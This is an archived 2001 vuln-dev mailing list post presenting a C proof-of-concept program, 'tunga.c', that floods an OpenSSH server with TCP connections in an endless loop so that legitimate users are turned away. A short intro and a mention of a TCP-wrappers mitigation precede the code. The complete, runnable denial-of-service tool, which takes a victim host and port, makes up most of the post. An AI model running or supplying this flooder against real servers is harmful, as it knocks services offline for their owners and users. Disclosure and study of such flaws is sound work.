Possible OpenSSH DoS Attack

From: Pedro Inacio (drbrain@phibernet.org)
Date: 12/11/01


From: "Pedro Inacio" <drbrain@phibernet.org>
To: <vuln-dev@securityfocus.com>
Date: Mon, 10 Dec 2001 23:19:18 -0000


--[ OpenSSH DoS Attack proof of concept ]--
  by DrBrain <drbrain@phibernet.org> / http://www.phibernet.org

--[ Intro ]--

After some tests with sshd, I have noticed that it is possible to generate a
DoS attack that gives you the following message when you try to contact the
service:

----------
$ ssh user@somehost.com
ssh_exchange_identification: Connection closed by remote host
----------

This just happens while running the code bellow, because when you stop
running it everything works fine.

It seems to be a known problem (
http://www.snailbook.com/faq/libwrap-oops.auto.html ), but until now there
is no patch available and this problem is present in all OpenSSH versions.

Although, there is an advisory to compile the SSH server with libwrap
(TCP-wrappers) support and then add some rules in /etc/hosts.{allow,deny} in
order to allow connections to sshd from any source address.

Anyway, I have made some tests and ALL the machines where vulnerable.
In my opinion it is urgent to fix this as soon as possible.

--[ Code ]--

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

int main (int argc, char *argv[]) {

  int sd, rc;
  struct sockaddr_in localAddr, servAddr;
  struct linger ling;
  struct hostent *h;

  if(argc < 3) {
    printf("tunga.c - OpenSSH DoS Attack\n");
    printf("by DrBrain <drbrain@phibernet.org>\n");
    printf("Phibernet Information Network < http://www.phibernet.org
>\n\n");
    printf("Usage: %s <victim> <port>\n\n",argv[0]);
    exit(1);
  }

  h = gethostbyname(argv[1]);
  if(h==NULL) {
    printf("%s: Unknown Host '%s'\n",argv[0],argv[1]);
    exit(1);
  }

  for(;;) {
    servAddr.sin_family = h->h_addrtype;
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
h->h_length);
    servAddr.sin_port = htons(atoi(argv[2]));

    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd<0) {
      perror("Cannot Open Socket ");
      exit(1);
    }

    rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
    if(rc<0) {
      perror("Cannot Connect ");
      exit(1);
    }
  }
  exit(0);
}

That's it!

I would like to thank megas and FatZU and all the guys in Phibernet for
helping me with some machines while testing the DoS.

-- DrBrain
"If you don't have a hammer, hack it" ;)



Relevant Pages

  • Re: Possible OpenSSH DoS Attack
    ... > After some tests with sshd, I have noticed that it is possible to generate a ... > DoS attack that gives you the following message when you try to contact the ... Isn't this just TCP socket connection overloading? ... networks/systems/security && CCNA, RHCE ...
    (Vuln-Dev)
  • 4.0f crash
    ... _crashtime: struct { ... 07856 crashdc ... 07923 sshd ... 07947 grep ...
    (Tru64-UNIX-Managers)